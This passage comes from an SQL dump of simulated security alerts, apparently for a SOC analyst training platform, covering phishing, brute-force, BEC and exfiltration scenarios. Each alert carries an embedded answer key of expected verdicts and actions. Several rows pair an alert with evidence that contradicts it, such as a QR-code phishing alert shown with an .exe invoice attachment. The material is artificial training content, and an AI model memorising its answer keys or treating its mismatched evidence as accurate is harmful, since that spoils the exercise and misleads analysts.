(1377, 'Malicious Email Attachment Detected', 'critical', 'Proofpoint', 'An email was received containing an attachment with a known malicious file hash.', 'Phishing', 'T1566', 1, 'investigating', 254, '{\"timestamp\":\"2026-03-02T07:30:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.75\",\"email_sender\":\"invoice@legitcompany.com\",\"attachment_hash\":\"6dcd4ce23d88e2ee956d7f4c8f3c3c6d\",\"username\":\"finance@company.com\"}', '2026-03-02 03:07:37', '2026-03-06 07:27:42', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"6dcd4ce23d88e2ee956d7f4c8f3c3c6d\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 62 AV engines\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"invoice@legitcompany.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email address used in previous phishing campaigns\"}}],\"expected_actions\":[\"block_hash\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Attachment hash is widely recognized as malicious, confirming the phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Malicious Email Attachment Detected\",\"date\":\"2026-03-02T13:55:06.900Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1378, 'Unauthorized Access Attempt Detected from Malicious IP', 'high', 'Splunk', 'An unauthorized access attempt detected from a known malicious IP address targeting a sensitive server.', 'Brute Force', 'T1110', 1, 'investigating', 235, '{\"timestamp\":\"2026-03-02T16:00:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.100\",\"username\":\"admin\",\"hostname\":\"sensitive-server02\",\"failed_attempts\":\"30\"}', '2026-03-02 03:07:37', '2026-03-03 20:14:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.100\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 935 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"High-privilege internal account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Login failures from a high-risk IP suggest a targeted attack on admin accounts.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.901Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"sensitive-server02\\\",\\\"failed_attempts\\\":\\\"30\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.901Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"sensitive-server02\\\",\\\"failed_attempts\\\":\\\"30\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.901Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"sensitive-server02\\\",\\\"failed_attempts\\\":\\\"30\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.901Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"sensitive-server02\\\",\\\"failed_attempts\\\":\\\"30\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.901Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T16:00:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.100\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"sensitive-server02\\\",\\\"failed_attempts\\\":\\\"30\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1379, 'Phishing Email with QR Code Detected', 'medium', 'Proofpoint', 'A phishing email containing a QR code designed to redirect to a malicious site was detected.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T08:45:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.55\",\"email_sender\":\"alert@securitybank.com\",\"username\":\"user@company.com\",\"url\":\"http://malicious-qrcode-site.com\"}', '2026-03-02 03:07:37', '2026-03-06 10:27:43', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alert@securitybank.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email associated with phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-qrcode-site.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"QR code redirects to a phishing site\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The QR code links to a malicious site, confirming the phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'FINANCE', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"Phishing Email with QR Code Detected\",\"date\":\"2026-03-02T13:55:06.903Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1380, 'BEC Attempt Detected with Spoofed Domain', 'critical', 'Elastic SIEM', 'A business email compromise attempt detected with a spoofed domain, targeting financial transactions.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T15:20:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.70\",\"email_sender\":\"ceo@legitimatecompany.com\",\"domain\":\"legitimatecompany.com\",\"username\":\"finance@company.com\",\"url\":\"http://fake-invoice-page.com\"}', '2026-03-02 03:07:37', '2026-03-07 10:42:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@legitimatecompany.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain used in BEC attacks\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fake-invoice-page.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL mimics legitimate site for credential theft\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Spoofed domain and phishing URL indicate a targeted BEC attempt.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.904Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:20:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"email_sender\\\":\\\"ceo@legitimatecompany.com\\\",\\\"domain\\\":\\\"legitimatecompany.com\\\",\\\"username\\\":\\\"finance@company.com\\\",\\\"url\\\":\\\"http://fake-invoice-page.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.904Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System 
event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:20:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"email_sender\\\":\\\"ceo@legitimatecompany.com\\\",\\\"domain\\\":\\\"legitimatecompany.com\\\",\\\"username\\\":\\\"finance@company.com\\\",\\\"url\\\":\\\"http://fake-invoice-page.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.904Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:20:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"email_sender\\\":\\\"ceo@legitimatecompany.com\\\",\\\"domain\\\":\\\"legitimatecompany.com\\\",\\\"username\\\":\\\"finance@company.com\\\",\\\"url\\\":\\\"http://fake-invoice-page.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.904Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:20:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"email_sender\\\":\\\"ceo@legitimatecompany.com\\\",\\\"domain\\\":\\\"legitimatecompany.com\\\",\\\"username\\\":\\\"finance@company.com\\\",\\\"url\\\":\\\"http://fake-invoice-page.com\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.904Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T15:20:00Z\\\",\\\"event_type\\\":\\\"email_received\\\",\\\"src_ip\\\":\\\"203.0.113.70\\\",\\\"email_sender\\\":\\\"ceo@legitimatecompany.com\\\",\\\"domain\\\":\\\"legitimatecompany.com\\\",\\\"username\\\":\\\"finance@company.com\\\",\\\"url\\\":\\\"http://fake-invoice-page.com\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1381, 'Suspicious File Downloaded from Public IP', 'low', 'Wazuh', 'A file download from a public IP was detected, flagged as suspicious.', 'Malware', 'T1203', 0, 'Closed', 225, '{\"timestamp\":\"2026-03-02T12:05:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"203.0.113.95\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"user123\"}', '2026-03-02 03:07:37', '2026-03-07 11:46:07', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.95\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in suspicious download activities\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No detection by AV engines\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The file hash is clean, and download might stem from legitimate research.\"}', 'Novice', 'SIEM', 1, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.906Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch.\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:05:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"user123\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.906Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:05:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"user123\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.906Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:05:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"user123\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.906Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:05:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"user123\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.906Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T12:05:00Z\\\",\\\"event_type\\\":\\\"network_connection\\\",\\\"src_ip\\\":\\\"192.168.1.20\\\",\\\"dst_ip\\\":\\\"203.0.113.95\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"username\\\":\\\"user123\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0),
(1382, 'Credential Harvesting Attempt via Phishing Site', 'high', 'Azure Sentinel', 'A phishing site attempting credential harvesting was accessed by an internal user.', 'Phishing', 'T1566', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T14:10:00Z\",\"event_type\":\"web_request\",\"src_ip\":\"192.168.1.55\",\"dst_ip\":\"203.0.113.85\",\"domain\":\"malicious-credentials.com\",\"username\":\"employee3\"}', '2026-03-02 03:07:37', '2026-03-09 02:42:09', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"malicious-credentials.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain used for credential phishing\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in phishing activities\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Access to a known phishing domain indicates an attempt to harvest credentials.\"}', 'Novice', 'SIEM', 1, 1, 'RETAIL', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.908Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"domain\\\":\\\"malicious-credentials.com\\\",\\\"username\\\":\\\"employee3\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.908Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"domain\\\":\\\"malicious-credentials.com\\\",\\\"username\\\":\\\"employee3\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.908Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"domain\\\":\\\"malicious-credentials.com\\\",\\\"username\\\":\\\"employee3\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.908Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"domain\\\":\\\"malicious-credentials.com\\\",\\\"username\\\":\\\"employee3\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.908Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T14:10:00Z\\\",\\\"event_type\\\":\\\"web_request\\\",\\\"src_ip\\\":\\\"192.168.1.55\\\",\\\"dst_ip\\\":\\\"203.0.113.85\\\",\\\"domain\\\":\\\"malicious-credentials.com\\\",\\\"username\\\":\\\"employee3\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1383, 'CEO Impersonation Phishing Email Detected', 'critical', 'Proofpoint', 'An email impersonating the CEO was detected, attempting to initiate unauthorized financial transactions.', 'Phishing', 'T1566', 1, 'investigating', 246, '{\"timestamp\":\"2026-03-02T13:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.120\",\"email_sender\":\"ceo@company-fake.com\",\"domain\":\"company-fake.com\",\"username\":\"finance@company.com\",\"url\":\"http://fake-payment-portal.com\"}', '2026-03-02 03:07:37', '2026-03-05 07:54:39', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"ceo@company-fake.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email used in CEO impersonation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://fake-payment-portal.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL mimics payment portal for fraud\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"Impersonation of CEO with fraudulent URL confirms a targeted phishing attack.\"}', 'Novice', 'SIEM', 1, 1, 'GOVERNMENT', NULL, NULL, '{\"tool\":\"Mail\",\"evidence\":{\"headers\":{\"from\":\"urgent@support-microsoft-update.com\",\"to\":\"employee@company.com\",\"subject\":\"CEO Impersonation Phishing Email Detected\",\"date\":\"2026-03-02T13:55:06.909Z\",\"x-mailer\":\"PHPMailer 6.0\"},\"attachments\":[{\"name\":\"invoice_feb.pdf.exe\",\"size\":\"1.2MB\",\"type\":\"application/x-msdos-program\",\"verdict\":\"Malicious\"}],\"body_preview\":\"Dear User, please check the attached invoice immediately...\",\"security_check\":\"FAIL - SPF/DKIM Mismatch\"}}', 0),
(1384, 'Unauthorized Admin Login Attempt', 'high', 'Splunk', 'Multiple unauthorized login attempts detected for an admin account from a foreign IP.', 'Brute Force', 'T1110', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T17:45:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.200\",\"username\":\"admin\",\"hostname\":\"secure-server01\",\"failed_attempts\":\"50\"}', '2026-03-02 03:07:37', '2026-03-09 02:35:16', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP flagged for multiple unauthorized login attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"High-privilege internal account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Frequent failed logins from a malicious IP suggest a brute force attempt.\"}', 'Novice', 'SIEM', 1, 1, 'ENERGY', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.911Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server01\\\",\\\"failed_attempts\\\":\\\"50\\\"}\"},{\"timestamp\":\"2026-03-02T13:54:06.911Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server01\\\",\\\"failed_attempts\\\":\\\"50\\\"}\"},{\"timestamp\":\"2026-03-02T13:53:06.911Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server01\\\",\\\"failed_attempts\\\":\\\"50\\\"}\"},{\"timestamp\":\"2026-03-02T13:52:06.911Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server01\\\",\\\"failed_attempts\\\":\\\"50\\\"}\"},{\"timestamp\":\"2026-03-02T13:51:06.911Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2026-03-02T17:45:00Z\\\",\\\"event_type\\\":\\\"login_failure\\\",\\\"src_ip\\\":\\\"203.0.113.200\\\",\\\"username\\\":\\\"admin\\\",\\\"hostname\\\":\\\"secure-server01\\\",\\\"failed_attempts\\\":\\\"50\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1385, 'Data Exfiltration Attempt via Suspicious Domain', 'critical', 'Wazuh', 'Data exfiltration attempt detected via a connection to a suspicious domain.', 'Data Exfil', 'T1048', 1, 'Closed', 225, '{\"timestamp\":\"2026-03-02T18:30:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.70\",\"dst_ip\":\"203.0.113.175\",\"domain\":\"exfiltration-domain.com\",\"username\":\"dataadmin\"}', '2026-03-02 03:07:37', '2026-03-07 10:44:21', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"exfiltration-domain.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain known for data exfiltration\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.175\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP used in data exfiltration activities\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Connection to a known exfiltration domain indicates a data breach attempt.\"}', 'Novice', 'SIEM', 1, 1, 'TECH', NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-02T13:55:06.912Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum 